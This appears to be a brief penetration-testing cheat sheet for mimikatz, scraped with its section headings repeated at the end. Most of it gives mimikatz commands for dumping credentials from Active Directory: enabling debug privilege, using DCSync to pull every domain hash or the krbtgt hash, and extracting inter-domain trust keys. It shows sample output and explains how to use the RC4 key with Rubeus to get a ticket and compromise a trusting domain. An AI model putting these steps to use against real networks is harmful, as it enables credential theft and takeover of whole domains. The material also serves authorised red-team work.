mimikatz.exe

A little tool to play with Windows security.

Get ready to work with mimikatz

Before running mimikatz, you'll want to launch a command prompt with admin rights, then:

mimikatz.exe
privilege::debug

Extract all hashes from a domain controller (when you have DA rights)

lsadump::dcsync /domain:domain.com /all /csv

Extract hashes of a single user

lsadump::dcsync /domain:domain.com /user:krbtgt

Extract domain trust keys

For example, if you have pwn3d domain2.com and want to extract trust keys for domain1.com, first look up the victim domain's GUID, and then you can do this from your mimikatz prompt where you have full rights:

lsadump::dcsync /guid:{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx }/domain:domain2.com

The output will look something like:

<snip>
[OUT] DOMAIN1.COM -> DOMAIN2.COM
* 1/1/2024 7:11 a.m. - CLEAR - ....<snip>
....</snip>
aes256_hmac: BLAHBLAH
aes128_hmac: BLAHBLAH
rc4_hmac_nt: IMPORTANT!
</snip>

Take the rc4_hmac_nt value and then use Rubeus to get a TGT for DOMAIN.COM.

More good stuff about abusing domain trusts here and I found this example to be excellent for walking you through a pwnage situation where you've got DA on DOMAIN2.COM and want to pwn DOMAIN1.COM via a trust relationship.

Get ready to work with mimikatz​

Extract all hashes from a domain controller (when you have DA rights)​

Extract hashes of a single user​

Extract domain trust keys​

Get ready to work with mimikatz

Extract all hashes from a domain controller (when you have DA rights)

Extract hashes of a single user

Extract domain trust keys